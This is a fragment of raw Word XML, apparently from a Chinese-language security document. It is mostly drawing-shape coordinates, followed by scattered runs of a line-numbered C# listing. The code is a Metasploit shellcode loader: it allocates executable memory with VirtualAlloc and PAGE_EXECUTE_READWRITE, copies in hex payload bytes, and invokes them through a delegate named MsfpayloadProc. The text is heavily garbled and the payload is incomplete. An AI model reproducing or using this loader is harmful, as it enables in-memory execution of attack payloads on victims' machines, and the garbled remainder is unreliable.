6747,10674,6747,10673,6747,10672,6747,10671,6747,10669,6747,10668,6747,10666,6747,10665,6747,10663,6747,10662,6747,10660,6747,10658,6747,10657,6747,10655,6747,10653,6747,10651,6747,10649,6747,10647,6747,10645,6747,10642,6747,10640,6747,10638,6747,10635,6747,10633,6747,10631,6747,10628,6747,10625,6747,10623,6747,10620,6747,10617,6747,10614,6747,10611,6747,10608,6747,10605,6747,10601,6747,10598,6747,10595,6747,10591,6747,10588,6747,10584,6747,10580,6747,10576,6747,10573,6747,10569,6747,10565,6747,10560,6747,10556,6747,10552,6747,10547,6747,10543,6747,10538,6747,10534,6747,10529,6747,10524,6747,10519,6747,10514,6747,10509,6747,10504,6747,10498,6747,10493,6747,10487,6747,10482,6747,10476,6747,10470,6747,10464,6747,10458,6747,10452,6747,10446,6747,10439e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:571.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,11430" coordsize="130,270">
        <v:shape style="position:absolute;left:4810;top:11430;width:130;height:270" coordorigin="4810,11430" coordsize="130,270" path="m4826,11445l4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4828,11445,4828,11445,4828,11445,4828,11445,4828,11445,4828,11445,4829,11445,4829,11445,4829,11445,4829,11445,4829,11445,4830,11445,4830,11445,4830,11445,4831,11445,4831,11445,4831,11445,4832,11445,4832,11445,4833,11445,4833,11445,4833,11445,4834,11445,4834,11445,4835,11445,4835,11445,4836,11445,4836,11445,4837,11445,4838,11445,4838,11445,4839,11445,4840,11445,4840,11445,4841,11445,4842,11445,4843,11445,4843,11445,4844,11445,4845,11445,4846,11445,4847,11445,4848,11445,4849,11445,4850,11445,4851,11445,4852,11445,4853,11445,4854,11445,4855,11445,4856,11445,4858,11445,4859,11445,4860,11445,4862,11445,4863,11445,4864,11445,4866,11445,4867,11445,4869,11445,4870,11445,4872,11445,4873,11445,4875,11445,4877,11445,4878,11445,4880,11445,4882,11445,4884,11445,4886,11445,4888,11445,4889,11445,4891,11445,4893,11445,4896,11445,4898,11445,4900,11445,4902,11445,4904,11445,4907,11445,4909,11445,4911,11445,4914,11445,4916,11445,4919,11445,4921,11445,4924,11445,4927,11445,4929,11445,4932,11445,4935,11445,4938,11445,4941,11445,4943,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11446,4946,11446,4946,11446,4946,11446,4946,11446,4946,11446,4946,11447,4946,11447,4946,11447,4946,11447,4946,11448,4946,11448,4946,11448,4946,11449,4946,11449,4946,11450,4946,11450,4946,11451,4946,11451,4946,11452,4946,11452,4946,11453,4946,11454,4946,11454,4946,11455,4946,11456,4946,11457,4946,11458,4946,11459,4946,11459,4946,11460,4946,11462,4946,11463,4946,11464,4946,11465,4946,11466,4946,11467,4946,11469,4946,11470,4946,11471,4946,11473,4946,11474,4946,11476,4946,11477,4946,11479,4946,11481,4946,11483,4946,11484,4946,11486,4946,11488,4946,11490,4946,11492,4946,11494,4946,11497,4946,11499,4946,11501,4946,11504,4946,11506,4946,11509,4946,11511,4946,11514,4946,11517,4946,11519,4946,11522,4946,11525,4946,11528,4946,11531,4946,11534,4946,11538,4946,11541,4946,11544,4946,11548,4946,11551,4946,11555,4946,11559,4946,11563,4946,11567,4946,11571,4946,11575,4946,11579,4946,11583,4946,11587,4946,11592,4946,11596,4946,11601,4946,11605,4946,11610,4946,11615,4946,11620,4946,11625,4946,11630,4946,11635,4946,11641,4946,11646,4946,11652,4946,11657,4946,11663,4946,11669,4946,11675,4946,11681,4946,11687,4946,11694,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4945,11700,4945,11700,4945,11700,4945,11700,4945,11700,4945,11700,4944,11700,4944,11700,4944,11700,4944,11700,4943,11700,4943,11700,4943,11700,4943,11700,4942,11700,4942,11700,4942,11700,4941,11700,4941,11700,4940,11700,4940,11700,4940,11700,4939,11700,4939,11700,4938,11700,4938,11700,4937,11700,4936,11700,4936,11700,4935,11700,4935,11700,4934,11700,4933,11700,4933,11700,4932,11700,4931,11700,4930,11700,4930,11700,4929,11700,4928,11700,4927,11700,4926,11700,4925,11700,4924,11700,4923,11700,4922,11700,4921,11700,4920,11700,4919,11700,4918,11700,4916,11700,4915,11700,4914,11700,4913,11700,4911,11700,4910,11700,4909,11700,4907,11700,4906,11700,4904,11700,4903,11700,4901,11700,4900,11700,4898,11700,4896,11700,4895,11700,4893,11700,4891,11700,4889,11700,4887,11700,4885,11700,4883,11700,4881,11700,4879,11700,4877,11700,4875,11700,4873,11700,4871,11700,4869,11700,4866,11700,4864,11700,4862,11700,4859,11700,4857,11700,4854,11700,4852,11700,4849,11700,4846,11700,4844,11700,4841,11700,4838,11700,4835,11700,4832,11700,4829,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11699,4826,11699,4826,11699,4826,11699,4826,11699,4826,11699,4826,11699,4826,11698,4826,11698,4826,11698,4826,11698,4826,11698,4826,11697,4826,11697,4826,11697,4826,11696,4826,11696,4826,11695,4826,11695,4826,11694,4826,11694,4826,11693,4826,11693,4826,11692,4826,11692,4826,11691,4826,11690,4826,11689,4826,11689,4826,11688,4826,11687,4826,11686,4826,11685,4826,11684,4826,11683,4826,11682,4826,11681,4826,11680,4826,11679,4826,11677,4826,11676,4826,11675,4826,11673,4826,11672,4826,11670,4826,11669,4826,11667,4826,11666,4826,11664,4826,11662,4826,11660,4826,11658,4826,11656,4826,11654,4826,11652,4826,11650,4826,11648,4826,11646,4826,11643,4826,11641,4826,11639,4826,11636,4826,11633,4826,11631,4826,11628,4826,11625,4826,11622,4826,11619,4826,11616,4826,11613,4826,11610,4826,11607,4826,11604,4826,11600,4826,11597,4826,11593,4826,11590,4826,11586,4826,11582,4826,11578,4826,11574,4826,11570,4826,11566,4826,11562,4826,11557,4826,11553,4826,11548,4826,11544,4826,11539,4826,11534,4826,11530,4826,11525,4826,11520,4826,11514,4826,11509,4826,11504,4826,11498,4826,11493,4826,11487,4826,11481,4826,11476,4826,11470,4826,11464,4826,11457,4826,11451,4826,11445e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:590.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,11810" coordsize="130,250">
        <v:shape style="position:absolute;left:4930;top:11810;width:130;height:250" coordorigin="4930,11810" coordsize="130,250" path="m4946,11820l4946,11820,4946,11820,4946,11820,4946,11820,4946,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4948,11820,4948,11820,4948,11820,4948,11820,4948,11820,4948,11820,4949,11820,4949,11820,4949,11820,4949,11820,4950,11820,4950,11820,4950,11820,4950,11820,4951,11820,4951,11820,4951,11820,4952,11820,4952,11820,4953,11820,4953,11820,4953,11820,4954,11820,4954,11820,4955,11820,4955,11820,4956,11820,4957,11820,4957,11820,4958,11820,4958,11820,4959,11820,4960,11820,4960,11820,4961,11820,4962,11820,4963,11820,4963,11820,4964,11820,4965,11820,4966,11820,4967,11820,4968,11820,4969,11820,4970,11820,4971,11820,4972,11820,4973,11820,4974,11820,4975,11820,4977,11820,4978,11820,4979,11820,4980,11820,4982,11820,4983,11820,4984,11820,4986,11820,4987,11820,4989,11820,4990,11820,4992,11820,4993,11820,4995,11820,4997,11820,4998,11820,5000,11820,5002,11820,5004,11820,5006,11820,5008,11820,5010,11820,5012,11820,5014,11820,5016,11820,5018,11820,5020,11820,5022,11820,5024,11820,5027,11820,5029,11820,5031,11820,5034,11820,5036,11820,5039,11820,5041,11820,5044,11820,5047,11820,5049,11820,5052,11820,5055,11820,5058,11820,5061,11820,5064,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11821,5067,11821,5067,11821,5067,11821,5067,11821,5067,11821,5067,11822,5067,11822,5067,11822,5067,11822,5067,11823,5067,11823,5067,11823,5067,11824,5067,11824,5067,11824,5067,11825,5067,11825,5067,11826,5067,11826,5067,11827,5067,11828,5067,11828,5067,11829,5067,11830,5067,11830,5067,11831,5067,11832,5067,11833,5067,11834,5067,11835,5067,11836,5067,11837,5067,11838,5067,11839,5067,11840,5067,11841,5067,11842,5067,11844,5067,11845,5067,11847,5067,11848,5067,11849,5067,11851,5067,11853,5067,11854,5067,11856,5067,11858,5067,11860,5067,11862,5067,11863,5067,11865,5067,11868,5067,11870,5067,11872,5067,11874,5067,11876,5067,11879,5067,11881,5067,11884,5067,11886,5067,11889,5067,11892,5067,11895,5067,11897,5067,11900,5067,11903,5067,11907,5067,11910,5067,11913,5067,11916,5067,11920,5067,11923,5067,11927,5067,11930,5067,11934,5067,11938,5067,11942,5067,11946,5067,11950,5067,11954,5067,11958,5067,11962,5067,11967,5067,11971,5067,11976,5067,11981,5067,11985,5067,11990,5067,11995,5067,12000,5067,12005,5067,12011,5067,12016,5067,12021,5067,12027,5067,12033,5067,12038,5067,12044,5067,12050,5067,12056,5067,12062,5067,12069,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5065,12075,5065,12075,5065,12075,5065,12075,5065,12075,5065,12075,5064,12075,5064,12075,5064,12075,5064,12075,5063,12075,5063,12075,5063,12075,5063,12075,5062,12075,5062,12075,5062,12075,5061,12075,5061,12075,5060,12075,5060,12075,5060,12075,5059,12075,5059,12075,5058,12075,5058,12075,5057,12075,5057,12075,5056,12075,5055,12075,5055,12075,5054,12075,5053,12075,5053,12075,5052,12075,5051,12075,5050,12075,5050,12075,5049,12075,5048,12075,5047,12075,5046,12075,5045,12075,5044,12075,5043,12075,5042,12075,5041,12075,5040,12075,5039,12075,5038,12075,5036,12075,5035,12075,5034,12075,5033,12075,5031,12075,5030,12075,5029,12075,5027,12075,5026,12075,5024,12075,5023,12075,5021,12075,5020,12075,5018,12075,5016,12075,5015,12075,5013,12075,5011,12075,5009,12075,5007,12075,5005,12075,5004,12075,5002,12075,4999,12075,4997,12075,4995,12075,4993,12075,4991,12075,4989,12075,4986,12075,4984,12075,4982,12075,4979,12075,4977,12075,4974,12075,4972,12075,4969,12075,4966,12075,4964,12075,4961,12075,4958,12075,4955,12075,4952,12075,4949,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12074,4946,12074,4946,12074,4946,12074,4946,12074,4946,12074,4946,12073,4946,12073,4946,12073,4946,12073,4946,12072,4946,12072,4946,12072,4946,12071,4946,12071,4946,12071,4946,12070,4946,12070,4946,12069,4946,12069,4946,12068,4946,12067,4946,12067,4946,12066,4946,12065,4946,12065,4946,12064,4946,12063,4946,12062,4946,12061,4946,12060,4946,12059,4946,12058,4946,12057,4946,12056,4946,12055,4946,12054,4946,12053,4946,12051,4946,12050,4946,12048,4946,12047,4946,12046,4946,12044,4946,12042,4946,12041,4946,12039,4946,12037,4946,12035,4946,12034,4946,12032,4946,12030,4946,12027,4946,12025,4946,12023,4946,12021,4946,12019,4946,12016,4946,12014,4946,12011,4946,12009,4946,12006,4946,12003,4946,12000,4946,11998,4946,11995,4946,11992,4946,11989,4946,11985,4946,11982,4946,11979,4946,11975,4946,11972,4946,11968,4946,11965,4946,11961,4946,11957,4946,11953,4946,11949,4946,11945,4946,11941,4946,11937,4946,11933,4946,11928,4946,11924,4946,11919,4946,11914,4946,11910,4946,11905,4946,11900,4946,11895,4946,11890,4946,11884,4946,11879,4946,11874,4946,11868,4946,11862,4946,11857,4946,11851,4946,11845,4946,11839,4946,11833,4946,11826,4946,11820e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.500pt;margin-top:608.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6250,12170" coordsize="130,250">
        <v:shape style="position:absolute;left:6250;top:12170;width:130;height:250" coordorigin="6250,12170" coordsize="130,250" path="m6267,12180l6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6269,12180,6269,12180,6269,12180,6269,12180,6269,12180,6269,12180,6270,12180,6270,12180,6270,12180,6270,12180,6271,12180,6271,12180,6271,12180,6272,12180,6272,12180,6272,12180,6273,12180,6273,12180,6274,12180,6274,12180,6275,12180,6275,12180,6276,12180,6276,12180,6277,12180,6277,12180,6278,12180,6278,12180,6279,12180,6280,12180,6280,12180,6281,12180,6282,12180,6283,12180,6283,12180,6284,12180,6285,12180,6286,12180,6287,12180,6288,12180,6289,12180,6290,12180,6291,12180,6292,12180,6293,12180,6294,12180,6295,12180,6296,12180,6297,12180,6298,12180,6300,12180,6301,12180,6302,12180,6304,12180,6305,12180,6306,12180,6308,12180,6309,12180,6311,12180,6312,12180,6314,12180,6316,12180,6317,12180,6319,12180,6321,12180,6323,12180,6324,12180,6326,12180,6328,12180,6330,12180,6332,12180,6334,12180,6336,12180,6338,12180,6341,12180,6343,12180,6345,12180,6347,12180,6350,12180,6352,12180,6354,12180,6357,12180,6359,12180,6362,12180,6365,12180,6367,12180,6370,12180,6373,12180,6376,12180,6378,12180,6381,12180,6384,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12181,6387,12181,6387,12181,6387,12181,6387,12181,6387,12181,6387,12181,6387,12182,6387,12182,6387,12182,6387,12182,6387,12182,6387,12183,6387,12183,6387,12183,6387,12184,6387,12184,6387,12185,6387,12185,6387,12186,6387,12186,6387,12187,6387,12187,6387,12188,6387,12188,6387,12189,6387,12190,6387,12191,6387,12191,6387,12192,6387,12193,6387,12194,6387,12195,6387,12196,6387,12197,6387,12198,6387,12199,6387,12200,6387,12201,6387,12203,6387,12204,6387,12205,6387,12207,6387,12208,6387,12210,6387,12211,6387,12213,6387,12214,6387,12216,6387,12218,6387,12220,6387,12222,6387,12224,6387,12226,6387,12228,6387,12230,6387,12232,6387,12234,6387,12237,6387,12239,6387,12241,6387,12244,6387,12247,6387,12249,6387,12252,6387,12255,6387,12258,6387,12261,6387,12264,6387,12267,6387,12270,6387,12273,6387,12276,6387,12280,6387,12283,6387,12287,6387,12290,6387,12294,6387,12298,6387,12302,6387,12306,6387,12310,6387,12314,6387,12318,6387,12323,6387,12327,6387,12332,6387,12336,6387,12341,6387,12346,6387,12350,6387,12355,6387,12360,6387,12366,6387,12371,6387,12376,6387,12382,6387,12387,6387,12393,6387,12399,6387,12404,6387,12410,6387,12416,6387,12423,6387,12429,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6386,12435,6386,12435,6386,12435,6386,12435,6386,12435,6386,12435,6386,12435,6385,12435,6385,12435,6385,12435,6385,12435,6385,12435,6384,12435,6384,12435,6384,12435,6384,12435,6383,12435,6383,12435,6383,12435,6382,12435,6382,12435,6382,12435,6381,12435,6381,12435,6380,12435,6380,12435,6379,12435,6379,12435,6378,12435,6378,12435,6377,12435,6377,12435,6376,12435,6375,12435,6375,12435,6374,12435,6373,12435,6373,12435,6372,12435,6371,12435,6370,12435,6369,12435,6369,12435,6368,12435,6367,12435,6366,12435,6365,12435,6364,12435,6363,12435,6362,12435,6361,12435,6360,12435,6358,12435,6357,12435,6356,12435,6355,12435,6353,12435,6352,12435,6351,12435,6349,12435,6348,12435,6346,12435,6345,12435,6343,12435,6342,12435,6340,12435,6339,12435,6337,12435,6335,12435,6334,12435,6332,12435,6330,12435,6328,12435,6326,12435,6324,12435,6322,12435,6320,12435,6318,12435,6316,12435,6314,12435,6312,12435,6309,12435,6307,12435,6305,12435,6302,12435,6300,12435,6297,12435,6295,12435,6292,12435,6290,12435,6287,12435,6284,12435,6282,12435,6279,12435,6276,12435,6273,12435,6270,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12434,6267,12434,6267,12434,6267,12434,6267,12434,6267,12433,6267,12433,6267,12433,6267,12433,6267,12432,6267,12432,6267,12432,6267,12431,6267,12431,6267,12430,6267,12430,6267,12429,6267,12429,6267,12428,6267,12428,6267,12427,6267,12426,6267,12426,6267,12425,6267,12424,6267,12423,6267,12422,6267,12421,6267,12421,6267,12420,6267,12419,6267,12417,6267,12416,6267,12415,6267,12414,6267,12413,6267,12411,6267,12410,6267,12409,6267,12407,6267,12406,6267,12404,6267,12403,6267,12401,6267,12399,6267,12397,6267,12396,6267,12394,6267,12392,6267,12390,6267,12388,6267,12386,6267,12383,6267,12381,6267,12379,6267,12376,6267,12374,6267,12371,6267,12369,6267,12366,6267,12363,6267,12361,6267,12358,6267,12355,6267,12352,6267,12349,6267,12346,6267,12342,6267,12339,6267,12336,6267,12332,6267,12329,6267,12325,6267,12321,6267,12317,6267,12313,6267,12310,6267,12305,6267,12301,6267,12297,6267,12293,6267,12288,6267,12284,6267,12279,6267,12275,6267,12270,6267,12265,6267,12260,6267,12255,6267,12250,6267,12245,6267,12239,6267,12234,6267,12228,6267,12223,6267,12217,6267,12211,6267,12205,6267,12199,6267,12193,6267,12187,6267,12180e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:626.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,12530" coordsize="130,270">
        <v:shape style="position:absolute;left:4930;top:12530;width:130;height:270" coordorigin="4930,12530" coordsize="130,270" path="m4946,12555l4946,12555,4946,12555,4946,12555,4946,12555,4946,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4948,12555,4948,12555,4948,12555,4948,12555,4948,12555,4948,12555,4949,12555,4949,12555,4949,12555,4949,12555,4950,12555,4950,12555,4950,12555,4950,12555,4951,12555,4951,12555,4951,12555,4952,12555,4952,12555,4953,12555,4953,12555,4953,12555,4954,12555,4954,12555,4955,12555,4955,12555,4956,12555,4957,12555,4957,12555,4958,12555,4958,12555,4959,12555,4960,12555,4960,12555,4961,12555,4962,12555,4963,12555,4963,12555,4964,12555,4965,12555,4966,12555,4967,12555,4968,12555,4969,12555,4970,12555,4971,12555,4972,12555,4973,12555,4974,12555,4975,12555,4977,12555,4978,12555,4979,12555,4980,12555,4982,12555,4983,12555,4984,12555,4986,12555,4987,12555,4989,12555,4990,12555,4992,12555,4993,12555,4995,12555,4997,12555,4998,12555,5000,12555,5002,12555,5004,12555,5006,12555,5008,12555,5010,12555,5012,12555,5014,12555,5016,12555,5018,12555,5020,12555,5022,12555,5024,12555,5027,12555,5029,12555,5031,12555,5034,12555,5036,12555,5039,12555,5041,12555,5044,12555,5047,12555,5049,12555,5052,12555,5055,12555,5058,12555,5061,12555,5064,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12557,5067,12557,5067,12557,5067,12557,5067,12557,5067,12558,5067,12558,5067,12558,5067,12559,5067,12559,5067,12559,5067,12560,5067,12560,5067,12561,5067,12561,5067,12562,5067,12562,5067,12563,5067,12564,5067,12564,5067,12565,5067,12566,5067,12567,5067,12567,5067,12568,5067,12569,5067,12570,5067,12571,5067,12572,5067,12573,5067,12574,5067,12575,5067,12577,5067,12578,5067,12579,5067,12581,5067,12582,5067,12583,5067,12585,5067,12586,5067,12588,5067,12590,5067,12591,5067,12593,5067,12595,5067,12597,5067,12599,5067,12601,5067,12603,5067,12605,5067,12607,5067,12610,5067,12612,5067,12614,5067,12617,5067,12619,5067,12622,5067,12624,5067,12627,5067,12630,5067,12633,5067,12636,5067,12639,5067,12642,5067,12645,5067,12648,5067,12652,5067,12655,5067,12658,5067,12662,5067,12666,5067,12669,5067,12673,5067,12677,5067,12681,5067,12685,5067,12689,5067,12693,5067,12698,5067,12702,5067,12707,5067,12711,5067,12716,5067,12721,5067,12726,5067,12731,5067,12736,5067,12741,5067,12746,5067,12751,5067,12757,5067,12762,5067,12768,5067,12774,5067,12780,5067,12786,5067,12792,5067,12798,5067,12804,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5065,12810,5065,12810,5065,12810,5065,12810,5065,12810,5065,12810,5064,12810,5064,12810,5064,12810,5064,12810,5063,12810,5063,12810,5063,12810,5063,12810,5062,12810,5062,12810,5062,12810,5061,12810,5061,12810,5060,12810,5060,12810,5060,12810,5059,12810,5059,12810,5058,12810,5058,12810,5057,12810,5057,12810,5056,12810,5055,12810,5055,12810,5054,12810,5053,12810,5053,12810,5052,12810,5051,12810,5050,12810,5050,12810,5049,12810,5048,12810,5047,12810,5046,12810,5045,12810,5044,12810,5043,12810,5042,12810,5041,12810,5040,12810,5039,12810,5038,12810,5036,12810,5035,12810,5034,12810,5033,12810,5031,12810,5030,12810,5029,12810,5027,12810,5026,12810,5024,12810,5023,12810,5021,12810,5020,12810,5018,12810,5016,12810,5015,12810,5013,12810,5011,12810,5009,12810,5007,12810,5005,12810,5004,12810,5002,12810,4999,12810,4997,12810,4995,12810,4993,12810,4991,12810,4989,12810,4986,12810,4984,12810,4982,12810,4979,12810,4977,12810,4974,12810,4972,12810,4969,12810,4966,12810,4964,12810,4961,12810,4958,12810,4955,12810,4952,12810,4949,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12809,4946,12809,4946,12809,4946,12809,4946,12809,4946,12808,4946,12808,4946,12808,4946,12807,4946,12807,4946,12807,4946,12806,4946,12806,4946,12805,4946,12805,4946,12804,4946,12804,4946,12803,4946,12803,4946,12802,4946,12801,4946,12801,4946,12800,4946,12799,4946,12798,4946,12798,4946,12797,4946,12796,4946,12795,4946,12794,4946,12793,4946,12792,4946,12790,4946,12789,4946,12788,4946,12787,4946,12785,4946,12784,4946,12782,4946,12781,4946,12779,4946,12778,4946,12776,4946,12774,4946,12773,4946,12771,4946,12769,4946,12767,4946,12765,4946,12763,4946,12761,4946,12759,4946,12756,4946,12754,4946,12752,4946,12749,4946,12747,4946,12744,4946,12741,4946,12739,4946,12736,4946,12733,4946,12730,4946,12727,4946,12724,4946,12721,4946,12717,4946,12714,4946,12711,4946,12707,4946,12704,4946,12700,4946,12696,4946,12693,4946,12689,4946,12685,4946,12681,4946,12677,4946,12672,4946,12668,4946,12664,4946,12659,4946,12654,4946,12650,4946,12645,4946,12640,4946,12635,4946,12630,4946,12625,4946,12620,4946,12614,4946,12609,4946,12603,4946,12598,4946,12592,4946,12586,4946,12580,4946,12574,4946,12568,4946,12562,4946,12555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1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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0x87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0x58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0x4b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0x56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0x21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0x4a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0xbf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0x45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0xd9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0x9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pacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e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,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="115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42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0xa0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0xe4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0x20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0x7f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0xfb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0xd0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0x88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0x13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0x6e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0x11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0xe9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0xd9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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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43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handle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44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="2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handle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Zero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codeBytes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,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47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="24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MEM_COMMIT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|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MEM_RESERVE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48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PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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try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50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Marshal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Copy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codeBytes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handle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codeBytes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Length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MsfpayloadProc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msfpayload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3980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Marshal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GetDelegateForFunctionPointer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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handle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typeof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MsfpayloadProc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as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MsfpayloadProc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;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54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msfpayload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55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56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="18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finally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57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{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58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VirtualFree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handle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MEM_RELEASE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59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60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}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"Kernel32.dll"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EntryPoint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"VirtualAlloc"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62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VirtualAlloc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int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size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nt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allocType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protect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DllImport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"Kernel32.dll"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EntryPoint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"VirtualFree"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45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64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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static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extern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bool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VirtualFree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IntPtr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int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size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freeType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;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65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const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MEM_COMMIT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0x1000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66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const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MEM_RESERVE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0x2000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67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const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PAGE_EXECUTE_READWRITE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0x40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68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const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uint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MEM_RELEASE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0x8000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69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
